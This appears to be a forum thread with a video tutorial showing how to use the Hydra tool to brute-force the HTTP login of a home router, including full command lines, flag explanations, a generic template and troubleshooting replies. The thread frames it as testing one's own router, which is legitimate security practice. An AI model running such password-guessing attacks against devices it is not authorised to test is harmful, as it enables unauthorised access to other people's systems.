[Video] How to: Crack HTTP passwords (hydra)

[g0tmi1k]

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2318952
Download video: http://www.mediafire.com/?yhc1adzytiqibjc


What is this?
A basic guide on how to use hydra to crack a http password on a 'home' router.


How does this work?
> Uses a dictionary attack to test for weak or simple passwords on one or more remote clients


What do I need?
> Hydra
> (Big) dictionary


Software
Name: Hydra
Version: 5.4
Home Page: http://freeworld.thc.org/welcome/
Download Link: http://freeworld.thc.org/download.ph...5.4-src.tar.gz


Commands:

Code:

hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get /

-l = username
-P = password (Looks for a wordlist)
-e ns = checks for 'null' password
-t xx= How many tasks to run at once
-f = exit once it finds the first user/password
-s = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.1 = IP address
http-get = what to crack/method etc
/ = Page to crack - root

Notes:
This is cut from my final video called "g0tmi1k's home network".
The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being crack is next to nothing!

Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)
Video length: 01:21
Capture length: 01:40

Blog Post:http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-http-hydra.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1657-%5Bvideo%5D-how-crack-http-passwords-hydra.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

[m0j4h3d]

thank you for the post .. nice ,,go for more

[g0tmi1k]

Thanks for the thanks.

[errorman]

I tried to crack my router with hydra, but I got an invalid pointer.
I have searched for a solution, some of the said that it is a bug in hydra.
So i googled it and found some patches but I was unable to succesfully use them.
Do someone here has a solution?

[Big_virus_55]

thanks man

This is the best

[g0tmi1k]

I tried to crack my router with hydra, but I got an invalid pointer.
I have searched for a solution, some of the said that it is a bug in hydra.
So i googled it and found some patches but I was unable to succesfully use them.
Do someone here has a solution?

Could you give some more information?
What router are you using?
What interface?
Whats the error?
What command are you using?

thanks man

This is the best

Thanks for the thanks! (=

[SaD Hack3r]

thanks i will try

[g0tmi1k]

nice post thx

thanks i will try

thank you for the post .. nice

thnks man great job ^^

Thanks for the thanks! Glad to hear feedback on it.

i wonder to know how this script run?
i cannot find where should i put the IP or Hostname, pls tell me how to do it.

tks

There isn't a script for this?! This is a general breakdown:

Code:

hydra -l [username] -P [/path/to/wordlist] -e ns -t 15 -f -s -vV [hostname/ip] http-get [folder]

Where can download the dicctionary because the link no work http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
Please
thanks for helper

Ive just tested the link - its working for me
Otherwise you can pick up some wordlists on the forum.

To log onto my router all you need is the password. When i type in

hydra -p /root/wpa/darkc0de.lst -e ns -t 15 -f -s -vV 192.168.2.1 http-get /

I get:

Error: I need at least the -l -L or -C option to know the login

But my router doesent have a login only a password!!

Please help

What happens if you set anything as the username? E.g. -l "thiscouldbeanything".
As its your router you can do a test by creating a small wordlist, with the correct password in the middle. Then try adding "-l "thiscouldbeanything"", and see if that works.

[just4fun]

Great post